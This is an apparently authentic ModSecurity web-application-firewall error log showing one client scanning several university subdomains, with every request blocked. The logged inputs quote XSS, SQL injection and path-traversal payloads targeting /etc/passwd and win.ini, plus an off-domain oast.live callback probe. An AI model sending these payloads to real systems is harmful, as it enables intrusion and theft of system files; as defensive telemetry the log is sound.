[Tue Aug 29 11:43:42.560104 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAARpg@YAAAAU"]
[Tue Aug 29 11:43:42.563492 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAe1eiQAAAAB"]
[Tue Aug 29 11:43:42.571973 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13fsCo-f0AAAdb7r0AAAAb"]
[Tue Aug 29 11:43:43.364660 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAfGaaMAAAAT"]
[Tue Aug 29 11:43:43.373648 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/file"] [unique_id "ZO13f8Co-f0AAAe1eiYAAAAB"]
[Tue Aug 29 11:43:43.395717 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:pow. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:pow: sds\\x22><script>alert(document.domain)</script><\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/Solar_SlideSub.php"] [unique_id "ZO13f8Co-f0AAAdb7r4AAAAb"]
[Tue Aug 29 11:43:44.375619 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAdb7sAAAAAb"]
[Tue Aug 29 11:43:44.380300 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAc@cd8AAAAL"]
[Tue Aug 29 11:43:44.385267 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAe39@cAAAAA"]
[Tue Aug 29 11:43:44.397119 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:valore. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:valore: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/file"] [unique_id "ZO13gMCo-f0AAAfGaaYAAAAT"]
[Tue Aug 29 11:43:44.413496 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gMCo-f0AAAe39@gAAAAA"]
[Tue Aug 29 11:43:45.373181 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAc4ErMAAAAP"]
[Tue Aug 29 11:43:45.377339 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAe8l3MAAAAF"]
[Tue Aug 29 11:43:45.384718 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAc@ceIAAAAL"]
[Tue Aug 29 11:43:45.388740 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdxUYkAAAAC"]
[Tue Aug 29 11:43:45.485115 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:s_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:s_id: 1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/arcade.php"] [unique_id "ZO13gcCo-f0AAAdb7sgAAAAb"]
[Tue Aug 29 11:43:47.400793 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAe8l34AAAAF"]
[Tue Aug 29 11:43:47.414477 2023] [:error] [pid 1854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAc@cekAAAAL"]
[Tue Aug 29 11:43:47.415510 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAenGbcAAAAM"]
[Tue Aug 29 11:43:47.421667 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAAeChfsAAAAw"]
[Tue Aug 29 11:43:47.427742 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13g8Co-f0AAARpg-YAAAAU"]
[Tue Aug 29 11:43:48.350460 2023] [:error] [pid 1922] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAeChfwAAAAw"]
[Tue Aug 29 11:43:48.355656 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAcsLM4AAAAE"]
[Tue Aug 29 11:43:48.360001 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAfBL2EAAAAI"]
[Tue Aug 29 11:43:48.365042 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAdOeVsAAAAS"]
[Tue Aug 29 11:43:48.370954 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdxUZMAAAAC"]
[Tue Aug 29 11:43:48.371970 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAenGbgAAAAM"]
[Tue Aug 29 11:43:48.411625 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hMCo-f0AAAcsLNEAAAAE"]
[Tue Aug 29 11:43:48.415733 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdb7tEAAAAb"]
[Tue Aug 29 11:43:48.431818 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.live found within TX:1: oast.live"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/render.html"] [unique_id "ZO13hMCo-f0AAAc4EsAAAAAP"]
[Tue Aug 29 11:43:48.451148 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAc4EsEAAAAP"]
[Tue Aug 29 11:43:48.468975 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13hMCo-f0AAAdOeWAAAAAS"]
[Tue Aug 29 11:43:49.416534 2023] [:error] [pid 1980] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAe8l4gAAAAF"]
[Tue Aug 29 11:43:49.417510 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAfBL2QAAAAI"]
[Tue Aug 29 11:43:49.419321 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:step. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:step: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/ad-widget/views/modal/"] [unique_id "ZO13hcCo-f0AAARpg-0AAAAU"]
[Tue Aug 29 11:43:49.439046 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAfBL2UAAAAI"]
[Tue Aug 29 11:43:49.439503 2023] [:error] [pid 1959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/alerts/alertLightbox.php"] [unique_id "ZO13hcCo-f0AAAenGb0AAAAM"]
